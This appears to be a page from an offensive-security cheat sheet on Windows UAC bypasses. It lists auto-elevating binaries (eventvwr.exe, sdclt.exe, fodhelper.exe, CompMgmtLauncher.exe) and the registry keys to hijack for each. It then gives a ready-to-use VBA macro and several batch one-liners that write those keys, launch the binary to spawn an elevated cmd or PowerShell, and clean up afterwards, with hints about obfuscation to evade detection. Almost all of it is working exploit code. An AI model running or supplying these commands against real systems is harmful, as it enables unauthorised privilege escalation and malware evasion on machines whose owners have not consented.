UAC Bypass

UAC Bypass #

Vulnerable programs #

CompMgmtLauncher.exe #

eventvwr.exe #

  • Windows 7/8/10
  • HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command = "cmd.exe"

sdclt.exe #

  • Windows 10
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe = "cmd.exe"

fodhelper.exe #

  • Windows 10
  • HKCU\Software\Classes\ms-settings\shell\open\command = "DelegateExecute"
  • HKCU\Software\Classes\ms-settings\shell\open\command = "cmd.exe"

Examples #

WScript Example 
' Credits to https://gist.github.com/dxflatline/6e399ea1fef59456d7ed82909f3bd506
' Sleep is caught (may use ping instead?)
' Obfusc may be needed
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Sub CommandButton1_Click()
   Set WSobj = CreateObject("WScript.Shell")
   WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", ""
   WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "C:\windows\system32\cmd.exe", "REG_SZ"
   WSobj.Run ("C:\Windows\System32\eventvwr.exe")
   Sleep 2000
   WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
   WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\"
   WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\"
   WSobj.RegDelete "HKCU\Software\Classes\mscfile\"
End Sub

Source: uac-bypass.vbs

Batch Example 
REM Credits to https://gist.github.com/xillwillx/39e5cccc846d5b5a475bbad48216a5a7

**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f

**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

Source: uac-bypass.bat